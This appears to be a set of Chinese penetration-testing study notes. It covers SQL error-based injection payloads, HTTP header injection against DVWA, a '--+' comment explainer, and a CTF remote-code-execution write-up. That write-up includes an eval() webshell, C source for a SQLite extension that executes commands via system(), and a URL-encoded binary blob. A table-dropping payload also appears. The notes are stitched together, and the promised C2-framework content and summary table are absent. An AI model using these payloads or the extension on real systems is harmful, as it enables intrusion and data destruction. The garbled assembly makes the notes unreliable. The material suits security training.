SQL报错注入与C2框架详解
报错注入的七大经典函数原理与Payload模板,并深入解析了Metasploit Framework (MSF)、Cobalt Strike (CS) 及冷门C2框架(如Havoc)的核心技术、流量隐藏与免杀技巧
一、 SQL报错注入七大核心函数
报错注入是利用数据库报错信息回显来提取数据的SQL注入技术,适用于无显示位但有错误输出的场景
cloud.tencent
。其核心是人为构造错误条件,将查询结果嵌入错误信息中返回。
1.1 报错注入核心原理与前提
原理:利用数据库某些函数在接收到不符合格式或非法参数时会报错,并返回错误信息,攻击者通过精心构造的SQL语句将想要获取的数据嵌入到错误信息中
blog.csdn
。
前提条件:
Web应用程序未关闭数据库报错函数,SQL语句的错误信息直接回显在页面上。
后台未对一些具有报错功能的函数(如extractvalue, updatexml, floor等)进行有效过滤
nonevector
。
优点:不需要显示位(UNION注入需要显示位)。
缺点:需要有SQL语句的报错信息,且时间成本相对较高,通常在UNION注入失效时考虑使用
m.blog.csdn。
1.2 七大经典报错注入函数详解与Payload模板
下表汇总了七大经典报错注入函数的原理、Payload模板及实战说明。
💡 实战步骤通用模板:
判断注入点与类型:输入单引号'等观察是否报错。
使用order by 判断列数。
获取数据库名:使用上述函数Payload。
爆表名:
sql
' and extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e))--+爆列名:
sql
' and extractvalue(1, concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name='your_table'), 0x7e))--+爆数据:
sql
' and extractvalue(1, concat(0x7e, (select group_concat(column1,0x3a,column2) from your_table), 0x7e))--+ (其中0x3a是:的十六进制,用于分隔字段)HTTP Header 注入 Level 3 详解(Referer Injection)
- 背景与定义
1.1 什么是 Referer Header?
Referer 请求头包含了当前请求页面的统一资源标识符(URI)。简单来说,它告诉服务器用户是从哪个页面跳转过来的。
用途:统计分析、防盗链、日志记录。
可控性:完全由用户端(浏览器或攻击工具如 Burp Suite)控制,因此常常成为注入点。
1.2 Level 3 注入场景
在许多 Web 应用中,服务器会将 Referer 的值直接记录到数据库中(如访问日志)或用于 SQL 查询中(如根据来源查询相关内容)。
漏洞根源:后端代码未对 Referer 头部数据进行过滤或转义,直接拼接到了 SQL 语句中。
常见形式:
SQL 注入:将 Referer 拼接到 SELECT 或 INSERT 语句。
XSS (跨站脚本):将 Referer 输出到前端页面而未转义。
- 漏洞原理深度解析
2.1 后端代码模拟(以 PHP 为例)
假设存在以下存在漏洞的后端代码(类似于 DVWA 的实现):
<?php
// 获取 HTTP Referer 头
sql
$referer = $_SERVER['HTTP_REFERER'];// 直接拼接到 SQL 查询中,未做过滤
sql
$query = "INSERT INTO access_logs (ip, referer) VALUES ('$_SERVER['REMOTE_ADDR']', '$referer')";
$result = mysql_query($query);// 或者用于查询
sql
// $query = "SELECT * FROM products WHERE source_url = '$referer'";2.2 攻击原理
攻击者通过抓包工具(如 Burp Suite)拦截请求,手动修改 Referer 头部的值。
构造 Payload:输入恶意的 SQL 语句片段。
闭合与注释:利用单引号 ' 闭合原本的字符串,并使用 -- - 或 # 注释掉后续代码。
拼接结果:恶意 SQL 被拼接到原语句中执行。
例如:
-- 原句
sql
INSERT INTO access_logs ... VALUES ('...', 'http://www.google.com')-- 注入后 (Payload: '; drop table access_logs -- -)
- 实战利用步骤(Burp Suite)
3.1 环境准备
目标靶场:DVWA (Damn Vulnerable Web Application) -> HTTP Headers -> Level 3 (Referer)。
工具:Burp Suite (Proxy + Repeater)。
3.2 详细利用流程
Step 1:开启代理并访问页面
浏览器配置代理指向 Burp Suite (127.0.0.1:8080)。
访问目标页面(如 http://dvwa/vulnerabilities/http_header/)。
关键动作:为了触发 Referer 头,最好是从另一个链接点击过来的,或者直接在 Burp 中查看请求。DVWA 的这个页面通常会自动抓取 Referer。
Step 2:拦截请求并发送到 Repeater
在 Burp Proxy 的 HTTP history 中找到对该页面的 GET 请求。
观察请求头,找到 Referer: ... 这一行。
正常值可能为:Referer: http://dvwa/vulnerabilities/http_header/
右键点击该请求 -> Send to Repeater。
Step 3:构造 Payload 并重放
在 Repeater 界面的 Headers 区域,修改 Referer 头。
常见 SQL 注入 Payload:
基础测试(判断是否存在注入)
Referer: '
如果页面报错(SQL Syntax Error),说明存在注入点。
联合查询注入
假设代码是 SELECT 类型,或者利用 INSERT 时构造闭合。
sql
Referer: ' union select user(), database(), version()-- -尝试在报错信息或回显位置获取用户名、数据库名和版本。
盲注 / 时间盲注
如果页面无回显,尝试基于时间的盲注。
sql
Referer: ' and if(1=1, sleep(5), 0)-- -观察响应时间,如果延迟明显,说明条件成立。
配合报错函数 (结合上一条笔记)
利用报错注入函数获取数据。
sql
Referer: ' and extractvalue(1, concat(0x7e, (select database()), 0x7e))-- -Step 4:分析响应
点击 Send 按钮。
观察 Response 区域:
是否有 SQL 错误信息?
页面内容是否发生变化(如显示了数据库版本)?
响应时间是否变长(盲注)?
- 配套的 Level 1 与 Level 2 头解析
为了完善你的笔记,这里简要对比一下同系列的其他关卡:
Level 1: X-Forwarded-For (XFF)
头名称:X-Forwarded-For (常用于记录客户端真实 IP)。
注入方式:修改该头的值为 Payload。
sql
** Payload**:' union select 1,2,3-- -Level 2: User-Agent
头名称:User-Agent (浏览器标识,常用于日志统计)。
注入方式:修改 UA 字符串。
sql
Payload:Mozilla/5.0' union select 1,2,3-- -Level 3: Referer
头名称:Referer (来源页面)。
注入方式:修改来源地址。
特点:往往结合 INSERT 语句(日志入库),但也可能是 SELECT。
- 防御建议(开发视角)
永远不要信任 HTTP 头:
HTTP 头完全由客户端控制,极易伪造。
使用参数化查询:
如果必须将 Referer 存入数据库,务必使用预处理语句,杜绝 SQL 注入。
sql
$stmt = $pdo->prepare("INSERT INTO logs (referer) VALUES (?)");
$stmt->execute([$referer]);严格的输入验证与过滤:
对 Referer 头进行格式校验(如必须是 URL 格式)。
过滤掉 SQL 关键字(', ", union, select, or, and 等)。
输出转义:
如果 Referer 会被显示在前端,必须进行 HTML 实体编码,防止 XSS 攻击。
最小权限原则:
数据库连接账户不应拥有 DROP TABLE、DELETE 等高危权限,减少注入后的破坏力。
总结
Level 3 header头注入通常指的是利用 Referer 头进行的 SQL 注入攻击。其核心在于后端直接信任并拼接了客户端可控的 HTTP 头数据。
利用点:Referer: [Payload]
工具:Burp Suite Repeater / Python requests 脚本
核心Payload:
sql
' and updatexml(1,concat(0x7e,database(),0x7e),1)-- -防御:参数化查询 + 输入验证 + 不信任 Headers。
User-Agent: 完全可控。这是由客户端发送的字符串,可以随意修改。
Remote-Addr: 不可直接通过 HTTP Header 修改。它是网络层的 TCP 连接信息,由服务器自动根据连接的源 IP 确定。
一、User-Agent (UA)
**用户代理User-Agent是一个 HTTP 请求头,用来告诉服务器你的浏览器类型、作系统版本、
是否可控:**是是,完全可控。
原理:这是纯文本信息,由浏览器或工具生成发送。 服务器信任你发送的内容(除非有专门的 WAF 校验)。
渗透意义:
注入攻击:如你之前提到的 Level 2 Header 注入,就是利用 UA 头进行 SQL 注入。
绕过 WAF:有些 WAF 只拦截浏览器的流量,修改 UA 为"爬虫"或"空"有时能绕过。
隐蔽性:伪装成 Google Bot 或合法浏览器流量。
二、Remote-Addr
Remote-Addr是服务器端(如 PHP 的 '__SERVER['REMOTE_ADDR'])获取的客户端真实的 IP 地址。
是否可控:**否否,不能直接通过在 HTTP Header 里添加 Remote-Addr: ... 来修改来修改
原理:
这是TCP/IP 协议栈 层面的信息。
当你建立 TCP 连接时,服务器的作系统会从网络包的 IP 头中读取源 IP 地址。
无论你在 HTTP Header 里写什么,只要包是从你的机器发出去的,服务器看到的 'Remote-Addr就是你的真实 IP。
误区:你不能在 HTTP 请求里加一行Remote-Addr: 1.1.1.1来欺骗服务器,服务器(Apache/Nginx)会忽略这个 Header,直接读取连接的 IP。
SQL注入中 --+ 的详细解释
1、 -- 的作用(SQL注释符)
-- 这是SQL的单行注释
SELECT * FROM users -- 后面的内容会被忽略
sql
数据库 注释方式
MySQL --, #, /* */
SQL Server --, /* */
Oracle --, /* */
PostgreSQL --, /* */2、+ 的作用(代表空格)
URL编码中:
- ──────► 空格(space)
%20 ────► 空格(space)
**为什么需要空格?
MySQL要求 -- 后面必须有空格才能生效为注释:
SELECT * FROM users --这样不行(无空格)
SELECT * FROM users -- 这样才行(有空格)
其他等效写法
写法 说明
--+ + 解码为空格
--%20 %20 是空格的URL编码
--/**/ 用注释符代替空格
MySQL特有(不需要空格)
-- - 直接用空格加任意字符
为什么不用 #?
在 MySQL 中,# 也是注释符,不需要后面加空格。但是在 URL 中,# 有特殊含义(表示网页的锚点/Fragment),浏览器不会把 # 后面的内容发送给服务器。**
如果用 #,必须手动编码为 %23。
如果用 --,为了补齐那个必须的空格,通常习惯用 --+(因为 + 比输入 %20 更方便) 。
CTF ez-rce解题
这是源码
php
<?php
highlight_file(__FILE__);
@eval($_POST['cdcas']);//cdcas?=phpinfo%28%29%3B首先利用在linux输入一下命令:
sql
apt install sqlite3 libsqlite3-dev然后将expolit.c文件传入然后进行一下编辑生成.so文件:
sql
#include <sqlite3ext.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
SQLITE_EXTENSION_INIT1
#ifdef _WIN32
__declspec(dllexport)
#endif
int sqlite3_exploit_init(
sqlite3 *db,
char **pzErrMsg,
const sqlite3_api_routines *pApi
) {
SQLITE_EXTENSION_INIT2(pApi);
const char *command_file_path = "/tmp/1.txt";
char command_buffer[512] = {0};
FILE *file_handle;
file_handle = fopen(command_file_path, "r");
if (file_handle == NULL) {
return SQLITE_OK;
}
if (fgets(command_buffer, sizeof(command_buffer), file_handle) != NULL) {
command_buffer[strcspn(command_buffer, "\r\n")] = 0;
if (strlen(command_buffer) > 0) {
system(command_buffer);
}
}
fclose(file_handle);
return SQLITE_OK;
}
这是exploit.c文件源码
sql
gcc -fPIC -shared -o exploit.so exploit.c -lsqlite3将exploit.so文件经过base64和urlencode编码后得到:
sql
%24base64%5Fso%3D%22f0VMRgIBAQ%C2%A0%20%0AAAAAAAAAAAAAMAPgABAAAAAAAAAAAAAABAAAAAAAAAAIg2AAAAAAAAAAAAAEAAOAALAEAAHgAdAAEAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAYAAAAAAAC4BgAAAAAAAAAQAAAAAAAAAQAAAAUAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAABAwAAAAAAAAEDAAAAAAAAABAAAAAAAAABAAAABAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAANQAAAAAAAAA1AAAAAAAAAAAEAAAAAAAAAEAAAAGAAAACC4AAAAAAAAIPgAAAAAAAAg%2BAAAAAAAASAIAAAAAAABYAgAAAAAAAAAQAAAAAAAAAgAAAAYAAAAYLgAAAAAAABg%2BAAAAAAAAGD4AAAAAAADAAQAAAAAAAMABAAAAAAAACAAAAAAAAAAEAAAABAAAAKgCAAAAAAAAqAIAAAAAAACoAgAAAAAAACAAAAAAAAAAIAAAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAIAAAAAAADIAgAAAAAAAMgCAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAU%2BV0ZAQAAACoAgAAAAAAAKgCAAAAAAAAqAIAAAAAAAAgAAAAAAAAACAAAAAAAAAACAAAAAAAAABQ5XRkBAAAABAgAAAAAAAAECAAAAAAAAAQIAAAAAAAACwAAAAAAAAALAAAAAAAAAAEAAAAAAAAAFHldGQGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAUuV0ZAQAAAAILgAAAAAAAAg%2BAAAAAAAACD4AAAAAAAD4AQAAAAAAAPgBAAAAAAAAAQAAAAAAAAAEAAAAEAAAAAUAAABHTlUAAgAAwAQAAAADAAAAAAAAAAQAAAAUAAAAAwAAAEdOVQCu6m7U9J4IVQUd6k3sg7B4jc5XOgAAAAACAAAACwAAAAEAAAAGAAAACgAEAAAQAAAAAAAACwAAAAArJSODdAZ5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAkQAAABIAAAAAAAAAAAAAAAAAAAAAAAAAmAAAABIAAAAAAAAAAAAAAAAAAAAAAAAAigAAABIAAAAAAAAAAAAAAAAAAAAAAAAAggAAABIAAAAAAAAAAAAAAAAAAAAAAAAAfAAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAdgAAABIAAAAAAAAAAAAAAAAAAAAAAAAALAAAACAAAAAAAAAAAAAAAAAAAAAAAAAARgAAACIAAAAAAAAAAAAAAAAAAAAAAAAAYQAAABIADgC5EQAAAAAAADgBAAAAAAAAVQAAABEAGQBYQAAAAAAAAAgAAAAAAAAAAF9fZ21vbl9zdGFydF9fAF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplAHNxbGl0ZTNfYXBpAHNxbGl0ZTNfZXhwbG9pdF9pbml0AGZvcGVuAGZnZXRzAHN0cmNzcG4Ac3lzdGVtAGZjbG9zZQBfX3N0YWNrX2Noa19mYWlsAGxpYmMuc28uNgBHTElCQ18yLjQAR0xJQkNfMi4yLjUAAAAAAQACAAMAAgACAAIAAQACAAEAAgABAAEAAAAAAAEAAgCpAAAAEAAAAAAAAAAUaWkNAAADALMAAAAQAAAAdRppCQAAAgC9AAAAAAAAAAg%2BAAAAAAAACAAAAAAAAACwEQAAAAAAABA%2BAAAAAAAACAAAAAAAAABwEQAAAAAAAEhAAAAAAAAACAAAAAAAAABIQAAAAAAAANg%2FAAAAAAAABgAAAAEAAAAAAAAAAAAAAOA%2FAAAAAAAABgAAAAcAAAAAAAAAAAAAAOg%2FAAAAAAAABgAAAAkAAAAAAAAAAAAAAPA%2FAAAAAAAABgAAAAwAAAAAAAAAAAAAAPg%2FAAAAAAAABgAAAAoAAAAAAAAAAAAAABhAAAAAAAAABwAAAAIAAAAAAAAAAAAAACBAAAAAAAAABwAAAAMAAAAAAAAAAAAAAChAAAAAAAAABwAAAAQAAAAAAAAAAAAAADBAAAAAAAAABwAAAAUAAAAAAAAAAAAAADhAAAAAAAAABwAAAAYAAAAAAAAAAAAAAEBAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPMPHvpIg%2BwISIsF0S8AAEiFwHQC%2F9BIg8QIwwAAAAAA%2FzXiLwAA8v8l4y8AAA8fAPMPHvpoAAAAAPLp4f%2F%2F%2F5DzDx76aAEAAADy6dH%2F%2F%2F%2BQ8w8e%2BmgCAAAA8unB%2F%2F%2F%2FkPMPHvpoAwAAAPLpsf%2F%2F%2F5DzDx76aAQAAADy6aH%2F%2F%2F%2BQ8w8e%2BmgFAAAA8umR%2F%2F%2F%2FkPMPHvry%2FyVdLwAADx9EAADzDx768v8lbS8AAA8fRAAA8w8e%2BvL%2FJWUvAAAPH0QAAPMPHvry%2FyVdLwAADx9EAADzDx768v8lVS8AAA8fRAAA8w8e%2BvL%2FJU0vAAAPH0QAAPMPHvry%2FyVFLwAADx9EAABIjT1JLwAASI0FQi8AAEg5%2BHQVSIsFvi4AAEiFwHQJ%2F%2BAPH4AAAAAAww8fgAAAAABIjT0ZLwAASI01Ei8AAEgp%2FkiJ8EjB7j9IwfgDSAHGSNH%2BdBRIiwWNLgAASIXAdAj%2F4GYPH0QAAMMPH4AAAAAA8w8e%2BoA91S4AAAB1K1VIgz1yLgAAAEiJ5XQMSIs9ti4AAOj5%2Fv%2F%2F6GT%2F%2F%2F%2FGBa0uAAABXcMPHwDDDx%2BAAAAAAPMPHvrpd%2F%2F%2F%2F%2FMPHvpVSInlSIHsQAIAAEiJvdj9%2F%2F9IibXQ%2Ff%2F%2FSImVyP3%2F%2F2RIiwQlKAAAAEiJRfgxwEiLBf0tAABIi5XI%2Ff%2F%2FSIkQSI0F%2FA0AAEiJheD9%2F%2F9Ix4Xw%2Ff%2F%2FAAAAAEjHhfj9%2F%2F8AAAAASI2VAP7%2F%2F7gAAAAAuT4AAABIidfzSKtIi4Xg%2Ff%2F%2FSI0VxQ0AAEiJ1kiJx%2Bif%2Fv%2F%2FSImF6P3%2F%2F0iDvej9%2F%2F8AdQe4AAAAAOtySIuV6P3%2F%2F0iNhfD9%2F%2F%2B%2BAAIAAEiJx%2Bhc%2Fv%2F%2FSIXAdD5IjYXw%2Ff%2F%2FSI0Vdg0AAEiJ1kiJx%2Bgu%2Fv%2F%2FxoQF8P3%2F%2FwBIjYXw%2Ff%2F%2FD7YAhMB0D0iNhfD9%2F%2F9Iicfo%2Bf3%2F%2F0iLhej9%2F%2F9Iicfoyv3%2F%2F7gAAAAASItV%2BGRIKxQlKAAAAHQF6MH9%2F%2F%2FJwwAAAPMPHvpIg%2BwISIPECMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA